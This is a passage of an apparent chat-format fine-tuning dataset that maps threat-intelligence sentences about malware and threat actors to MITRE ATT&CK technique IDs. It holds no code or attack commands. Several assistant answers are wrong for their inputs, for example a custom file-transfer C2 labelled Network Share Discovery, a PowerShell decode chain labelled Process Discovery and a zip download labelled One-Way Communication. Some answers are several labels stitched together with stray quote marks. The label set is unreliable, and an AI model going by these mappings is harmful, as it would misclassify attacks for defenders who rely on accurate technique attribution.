- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT can identify remote hosts on connected networks."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection. Figure 5 shows the commands used to perform these activities on a RAR archive renamed with a *.jpg extension"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9. This document contains an in-line link to a URL hosting a malware payload. When clicked, these links download malware binaries with file names masquerading as document files. In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files. Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\\Windows\\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\\Windows\\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RobbinHood deletes shadow copies to ensure that all the data cannot be restored easily."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 briefly distributed the Kegotip information stealer in April 2017. Across two campaigns of several million messages each, the actor used both macro-laden Microsoft Word documents and zipped VBScript attachments to install the Trojan on potential victim PCs. Kegotip is an infostealer (credentials and email addresses) used to facilitate other crimeware activities. It steals credentials from various FTP clients, Outlook, and Internet Explorer. It also will gather email addresses scraped from files stored on the computer. This information can be used to facilitate future spam campaigns by the perpetrator or may be sold to other actors"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InnaputRAT enumerates directories and obtains file attributes on a system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to index and compress files into a send queue for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has placed malware on file shares and given it the same name as legitimate documents on the share."
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These two files, keyword_parm.txt and parm.txt contain instructions for MESSAGETAP to target and save contents of SMS messages"
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware uses multiple types of encryption and encoding in its malware files, including AES, Caracachs, RC4, basic XOR with constant 0xA7, and other techniques."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can inject its code into a trusted process via the APC queue."
- },
- {
- "role": "assistant",
- "content": "T1055.004 - Process Injection: Asynchronous Procedure Call"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes additional Jscript and VBScript code on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In March, we came across an email with a malware attachment that used the Gamaredon group’s tactics."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used a file injector DLL to spawn a benign process on the victim's system and inject the malicious payload into it via process hollowing."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanHaiShu can change Internet Explorer settings to reduce warnings about malware activity."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID has used obfuscated VBA string expressions."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot has retrieved a GUID associated with a present LAN connection on a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In my previous blog, I noted that a variant of the Cerber downloader was seen using BITS for a brief period of time and 10 out of these 11 samples were Microsoft Word documents leading to Cerber."
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can check system time to help determine when changes were made to specified files."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "it operates over DNS traffic, but can also switch to encrypted channels such as HTTPS or SSL"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macros are also responsible for achieving reboot persistence for the ObliqueRAT payloads. This is done by creating a shortcut (.url file extension) in the infected user's Startup directory. Malicious shortcut in the infected user's startup directory to execute ObliqueRAT on startup"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The information this malware collected included the following:The computer nameThe usernameThe execution path of the sampleThe BIOS modelA randomly-generated ID to uniquely identify the systemGroup123 utilized this method to ensure their victim was (a) someone they wanted to target further and (b) someone they could infect further based on the information obtained from the reconnaissance phase"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can perform process injection by using a reflective DLL."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fourth, this Darkhotel event is not based on the network protocol C2, but based on a custom file transfer control instruction"
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda has a command to delete a file. It also can uninstall scripts and delete files to cover its track."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "China Chopper's client component is packed with UPX."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The execution of the malicious PuTTY binary resulted in the deployment of a backdoor to the host. The deployed backdoor is an evolution of the malware family Mandiant tracks as AIRDRY."
- },
- {
- "role": "assistant",
- "content": "T1218 - Signed Binary Proxy Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A file stealer transfers collected files to a hardcoded C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM compressed and staged files in multi-part archives in the Recycle Bin prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After decrypting itself in memory, downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This “downloaded” file is actually not dropped onto the system."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can scan local network for open SMB."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has bypassed UAC."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All this information is stored in the C:\\Users\\Public\\Videos\\si.ini file and sent in an email message, as an attachment, via SMTPS, using the default port 465. The email body contains the string SI (which probably stands for System Information), the recipient is sym777.g@post.cz. For all email exchange, the message’s Subject: set to the id"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The WhiteBear binary loader maintains several features including two injection methods for its (oddly named) “KernelInjector” subsystem, also named by its developer – Standart – WindowInject (includes an unusual technique for remotely placing code into memory for subsequent thread execution"
- },
- {
- "role": "assistant",
- "content": "T1055.003 - Thread Execution Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Newer variants of will encode C2 communications with a custom system."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackTech has exploited a buffer overflow vulnerability in Microsoft Internet Information Services (IIS) 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control (C2) server."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WIRTE has used PowerShell for script execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used pass the hash for authentication to remote access software used in C2."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID has embedded binaries within RC4 encrypted .png files."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clop has searched folders and subfolders for files to encrypt."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes shellcode and a script to decode Base64 strings."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel used a virus that propagates by infecting executables stored on shared drives."
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak can create a Windows account."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the network adapter’s IP and MAC address as well as IP addresses of the network adapter’s default gateway, primary/secondary WINS, DHCP, and DNS servers, and saves them into a log file."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group persistence mechanisms have used \"forfiles.exe\" to execute .htm files."
- },
- {
- "role": "assistant",
- "content": "T1202 - Indirect Command Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to enumerate processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A module in Prikormka collects information from the victim about Windows OS version, computer name, battery info, and physical memory."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can harvest clipboard data on both Windows and macOS systems."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has masqueraded as legitimate software update packages such as Adobe Acrobat Reader and Intel."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 2: Process chain for the first part of the campaign Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of process tree, its final purpose remained same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SodaMaster can use RC4 to encrypt C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Dust Storm, the threat actors deployed a file called `DeployJava.js` to fingerprint installed software on a victim system prior to exploit delivery."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "X-Force IRIS found that the SDBbot RAT installers are x64-packed and decrypt parts of SDBbot’s code and strings upon execution. In addition, they read a binary blob located within the registry HKLM\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\[3 characters]\\[1 character]. Depending on user privileges, a binary blog is located in the registry value. If regular user privileges are running, the installer component will establish persistence using the registry Run and execute ordinal #1 of the DLL"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak has the ability to enumerate domain admin accounts."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon execution, Metamorfo has unzipped itself after being downloaded to the system and has performed string decryption."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobian RAT has a feature to perform voice recording on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyTurla has been installed using a .bat file."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has downloaded a zip file for execution on the system."
- },
- {
- "role": "assistant",
- "content": "T1102.003 - One-Way Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "opens a remote shell to execute commands on the infected system."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor can check if a specific process is running, such as Kaspersky's `avp.exe`."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a custom version of the RC4 algorithm that includes a programming error."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Linfo creates a backdoor through which remote attackers can start a remote shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can explore files on a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer can download remote files and additional payloads to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "automatically searches for files on local drives based on a predefined list of file extensions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "steals files based on an extension list if a USB drive is connected to the system."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When the actor modifies the file and changes the modification_time, the Trojan downloads the contents from the file by creating an HTTP request to a URL structured as follows: + + “?alt=media” The Trojan processes the downloaded data within the file the same way it would to obtain a job from data received from the DNS tunneling channel using the TXT query mode, specifically by searching the data using the following regular expression: ([^r-v\\\\s]+)[r-v]([\\\\w\\\\d+\\\\/=]+).(||) The Trojan function splits the matching data, specifically the subdomain on a separator that is a character between r and v and uses the data before the separator to get the sequence number and a Boolean value (0 or 1) if more data is expected"
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged', 'T1041 - Exfiltration Over C2 Channel', 'T1048 - Exfiltration Over Alternative Protocol', 'T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes has used .MSI files as an initial way to start the infection chain."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar captures images from the webcam."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RemoteUtilities can upload and download files to and from a target machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has collected schemas and user accounts from systems running SQL Server."
- },
- {
- "role": "assistant",
- "content": "T1213 - Data from Information Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
